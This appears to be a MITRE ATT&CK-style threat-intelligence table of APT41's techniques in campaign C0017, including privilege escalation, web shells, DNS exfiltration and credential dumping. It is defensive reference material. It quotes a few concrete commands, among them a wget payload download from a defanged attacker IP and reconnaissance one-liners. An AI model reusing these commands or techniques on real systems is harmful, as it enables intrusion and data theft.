| enterprise |
T1134 |
Access Token Manipulation |
During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation. |
| enterprise |
T1071 |
Application Layer Protocol |
- |
| enterprise |
T1071.001 |
Web Protocols |
During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads. |
|
|
|
|
| enterprise |
T1560 |
Archive Collected Data |
- |
| enterprise |
T1560.003 |
Archive via Custom Method |
During C0017, APT41 hex-encoded PII data prior to exfiltration. |
| enterprise |
T1059 |
Command and Scripting Interpreter |
- |
| enterprise |
T1059.003 |
Windows Command Shell |
During C0017, APT41 used cmd.exe to execute reconnaissance commands. |
| enterprise |
T1059.007 |
JavaScript |
During C0017, APT41 deployed JScript web shells on compromised systems. |
|
|
|
|
| enterprise |
T1005 |
Data from Local System |
During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks. |
| enterprise |
T1001 |
Data Obfuscation |
- |
| enterprise |
T1001.003 |
Protocol Impersonation |
During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server. |
| enterprise |
T1074 |
Data Staged |
- |
| enterprise |
T1074.001 |
Local Data Staging |
During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory. |
| enterprise |
T1140 |
Deobfuscate/Decode Files or Information |
During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads. |
| enterprise |
T1048 |
Exfiltration Over Alternative Protocol |
- |
| enterprise |
T1048.003 |
Exfiltration Over Unencrypted Non-C2 Protocol |
During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain. |
| enterprise |
T1041 |
Exfiltration Over C2 Channel |
During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. |
| enterprise |
T1567 |
Exfiltration Over Web Service |
During C0017, APT41 used Cloudflare services for data exfiltration. |
| enterprise |
T1190 |
Exploit Public-Facing Application |
|
| During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access. |
|
|
|
| enterprise |
T1068 |
Exploitation for Privilege Escalation |
During C0017, APT41 abused named pipe impersonation for privilege escalation. |
| enterprise |
T1574 |
Hijack Execution Flow |
During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries. |
| enterprise |
T1105 |
Ingress Tool Transfer |
During C0017, APT41 downloaded malicious payloads onto compromised systems. |
| enterprise |
T1036 |
Masquerading |
- |
| enterprise |
T1036.004 |
Masquerade Task or Service |
During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code. |
| enterprise |
T1036.005 |
Match Legitimate Name or Location |
During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections. |
| enterprise |
T1027 |
Obfuscated Files or Information |
During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection. |
| enterprise |
T1027.002 |
Software Packing |
During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries. |
| enterprise |
T1588 |
Obtain Capabilities |
- |
| enterprise |
T1588.002 |
Tool |
For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato. |
| enterprise |
T1003 |
OS Credential Dumping |
- |
| enterprise |
T1003.002 |
Security Account Manager |
During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting. |
| enterprise |
T1090 |
Proxy |
During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic. |
| enterprise |
T1053 |
Scheduled Task/Job |
- |
| enterprise |
T1053.005 |
Scheduled Task |
During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared. |
| enterprise |
T1505 |
Server Software Component |
- |
| enterprise |
T1505.003 |
Web Shell |
During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects. |
| enterprise |
T1082 |
System Information Discovery |
During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems. |
|
|
|
|
| enterprise |
T1016 |
System Network Configuration Discovery |
During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery. |
| enterprise |
T1033 |
System Owner/User Discovery |
During C0017, APT41 used whoami to gather information from victim machines. |
| enterprise |
T1102 |
Web Service |
During C0017, APT41 used the Cloudflare services for C2 communications. |
| enterprise |
T1102.001 |
Dead Drop Resolver |
During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign. |